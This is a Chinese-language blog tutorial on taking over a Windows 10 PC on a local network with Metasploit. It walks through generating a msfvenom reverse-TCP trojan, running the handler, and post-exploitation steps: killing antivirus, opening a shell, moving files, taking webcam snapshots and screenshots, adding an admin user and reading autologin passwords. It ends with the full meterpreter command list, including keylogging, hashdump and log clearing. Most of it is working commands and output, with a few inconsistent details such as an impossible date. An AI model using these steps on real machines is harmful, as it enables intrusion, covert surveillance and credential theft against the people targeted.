使用 Metasploit 渗透局域网 Windows 设备
警告
请勿将本文提到的任何技术用于非法用途。
请遵守《中华人民共和国刑法》《中华人民共和国网络安全法》《中华人民共和国治安管理处罚法》和/或当地其他相关法律法规。
协议
本文按“原样”提供,不做任何明示或暗示的担保,包括但不限于对适用性、正确性、使用情景合法性的担保。在和任何情况下,作者均不对读者使用本文提及的内容造成的结果进行赔偿或承担任何责任。
本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可。(CC-BY-SA 4.0)
Copyright © 2020, 还没想好昵称的新建p
“警告”和“协议”的全部内容应该按原样包含在本文的所有转载副本内容中,无论文章内容变更与否。
如果您不同意协议中的任何一项,请勿继续阅读或转载,并关闭此页面。
环境和约定
我们约定,除非另有说明,本文所提及的攻击者和受害者 (靶机) 的 IP 地址和版本信息如下。
攻击者: 192.168.1.233, Kali Linux
受害者: 192.168.1.100, Windows 10 Pro 实体机, 版本 20H2, Windows Defender Antivirus (Security intelligence version 1.327.1470.0)
为保护隐私,本文提到的计算机名、IP 地址等为虚拟。
Table of Contents
本文分为前渗透阶段和后渗透阶段两部分。前渗透阶段主要为木马的生成和一些其他准备工作,后渗透阶段主要讲述具体的攻击内容。
前渗透阶段
首先,扫描局域网内所有 IP
nmap -sP 192.168.1.1/24
然后生成一个木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.233 lport=2333 -f exe R > ~/shell.exe
- 其中
lhost
是攻击者的 IP地址 lport
是反向连接到主机的端口R
是木马的输出路径
接下来,打开 msfconsole 。
msfconsole
进入 msfconsole 后,将看到启动文字界面和 msf5 >
。依次输入以下内容
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.233
msf5 exploit(multi/handler) > set lport 2333
-
其中,
use exploit/multi/handler
设置模块,得到如下输出
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > -
set payload windows/meterpreter/reverse_tcp
设置 payload 为反向 TCP 连接 ,您将看到
payload => windows/meterpreter/reverse_tcp -
set lhost 192.168.1.233
和set lport 2333
要与上文的 IP 地址和端口一致,您会分别看到
lhost => 192.168.0.233
lport => 2333
之后,我们开始攻击,输入
exploit
然后在受害者(靶机)上运行刚才生成的木马,在 Windows Defender Antivirus 中允许威胁(否则会无法拷贝)
您会看到
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.233:2333
[*] Sending stage (176195 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.233:2333 -> 192.168.1.100:49395) at 2020-02-30 23:23:33 +0800
meterpreter >
这时,靶机上已经成功运行起了我们的木马。
后渗透阶段
退出
要从 meterpreter 回到 msf,请输入
background
在 Sessions 间切换
在 msf 中,使用如下命令查看当前活动的会话
sessions -l
在 msf 中,使用如下命令切换会话
sessions -i 1
- 其中的
1
是会话 ID。
关闭防病毒软件
使用如下命令,杀死防病毒软件
run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value […]
[*] Killing Antivirus services on the target…
[*] Killing off Taskmgr.exe…
[*] Killing off cmd.exe…
[*] Killing off cmd.exe…
查看靶机信息
使用如下命令查看靶机的计算机名、操作系统、体系架构、系统语言、域、登录用户数量等信息
sysinfo
检查靶机为实体机或虚拟机
输入命令
run post/windows/gather/checkvm
若为虚拟机,您将看到 [+] This is a VMware Virtual Machine
若为实体机,您将看到 [*] DESKTOP-2333333 appears to be a Physical Machine
使用 Windows Shell
要使用靶机的 shell,请输入
shell
此时,您可以使用靶机的 cmd。
Process 23333 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.630]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\Users\Username\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2333-2333
Directory of C:\Users\Username\Desktop
02/30/2020 23:33 <DIR> .
02/30/2020 23:33 <DIR> ..
要退出 cmd,输入 exit
即可。
访问文件系统
您可以使用这些命令访问文件系统
cd 切换目录
cat 查看文件内容
rm 删除
edit 使用 vim 编辑
ls 列出当前目录的文件
pwd 获取当前工作目录
mkdir 创建目录
rmdir 删除目录
使用如下命令,上传或下载文件
download [options] src1 src2 src3 ... destination
upload [options] src1 src2 src3 ... destination
应用程序
使用如下命令,列出靶机上安装的程序和功能
run post/windows/gather/enum_applications
使用 execute
命令,运行靶机上的程序,语法如下
execute -f file [options]
-H
隐藏进程-a
向进程传递参数-i
与进程交互-m
在内存中执行-t
用当前伪造的线程令牌运行-s
在会话中执行
使用网络摄像头
分别使用如下命令,可以列出网络摄像头、拍摄照片、开启流媒体
webcam_list
此时列出了靶机的这些摄像头
1: NewTek NDI Video
2: OBS-Camera
3: OBS-Camera2
4: OBS-Camera3
5: OBS-Camera4
使用如下命令拍照
webcam_snap
使用如下命令开启流,将打开浏览器播放视频
webcam_stream
有关虚拟摄像头
如果靶机使用 OBS-Studio 和 CatxFish/obs-virtual-cam 的虚拟摄像头方案似乎会出现无法打开摄像头的错误 (通常是错误 14007 和 731),但使用 NDI 的 Virtual Input 可以实现。笔者通过 NewTek NDI for Adobe Creative Cloud 和 Adobe Premiere Pro 2020 实现了上图的效果。
【推广】 您是否想了解有关“使用 OBS 配置虚拟摄像头”的内容?请参考 我的这一篇博客 ! |
---|
屏幕截图
使用如下命令截图
screenshot
用户操作
使用命令列出当前登录的用户和最近的用户
run post/windows/gather/enum_logged_on_users
使用命令创建 Administrators 组用户
run getgui -u Username -p Password
- 其中
-u
后为用户名 -p
后为密码
如果靶机用户为自动登录,使用命令查看自动登录密码
run windows/gather/credentials/windows_autologin
提升权限
使用如下命令提权,但在 Windows 10 中测试无效
getsystem
附录: meterpreter 命令
输入 ?
,查看帮助。
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
Enjoy it!
本文部分内容参考了博客《Metasploit Framework(MSF)的使用》。